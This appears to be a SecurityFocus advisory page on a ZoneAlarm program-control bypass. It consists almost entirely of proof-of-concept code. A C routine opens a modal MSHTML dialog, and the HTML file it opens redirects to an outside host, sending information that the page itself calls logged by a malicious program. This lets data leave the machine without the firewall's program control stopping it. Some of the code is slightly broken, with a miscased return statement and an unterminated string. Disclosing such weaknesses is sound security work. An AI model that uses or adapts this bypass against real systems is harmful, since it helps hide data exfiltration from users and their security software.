Zone Labs Zone Alarm Advance Program Control Bypass Weakness

The following proof of concept is available:
<<< osfwbypass-demo.c >>>

BOOL LoadHtmlDialog(void)
{
HINSTANCE hinstMSHTML = LoadLibrary(TEXT("MSHTML.DLL"));

if (hinstMSHTML)
{
SHOWHTMLDIALOGFN* pfnShowHTMLDialog;

// Open a Modal Dialog box of HTML content type
pfnShowHTMLDialog = (SHOWHTMLDIALOGFN*)GetProcAddress(hinstMSHTML,
TEXT("ShowHTMLDialog"));

if (pfnShowHTMLDialog)
{
IMoniker *pURLMoniker;

// Invoke the html file containing the data to be sent via http
BSTR bstrURL = SysAllocString(L"c:\\modal-dialog.htm");
CreateURLMoniker(NULL, bstrURL, &pURLMoniker);

if (pURLMoniker)
{
(*pfnShowHTMLDialog)(NULL, pURLMoniker, NULL, NULL, NULL);
pURLMoniker->Release();
}

SysFreeString(bstrURL);
}

FreeLibrary(hinstMSHTML);
}

Return True;
}

<<< +++ >>>


<<< modal-dialog.htm >>>
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<title>Redirection Dialog</title>

<script language="JavaScript">

<!-- Here goes the information logged by the malicious program which will
be sent to the evil site via http request -->
var sTargetURL =
"http://www.hackingspirits.com/vuln-rnd/demo/defeat-osfw.asp?[Your
Information Here]
window.location.href = sTargetURL;
window.close;
</script>

</head>
</html>
<<< +++ >>>


 

Privacy Statement
Copyright 2010, SecurityFocus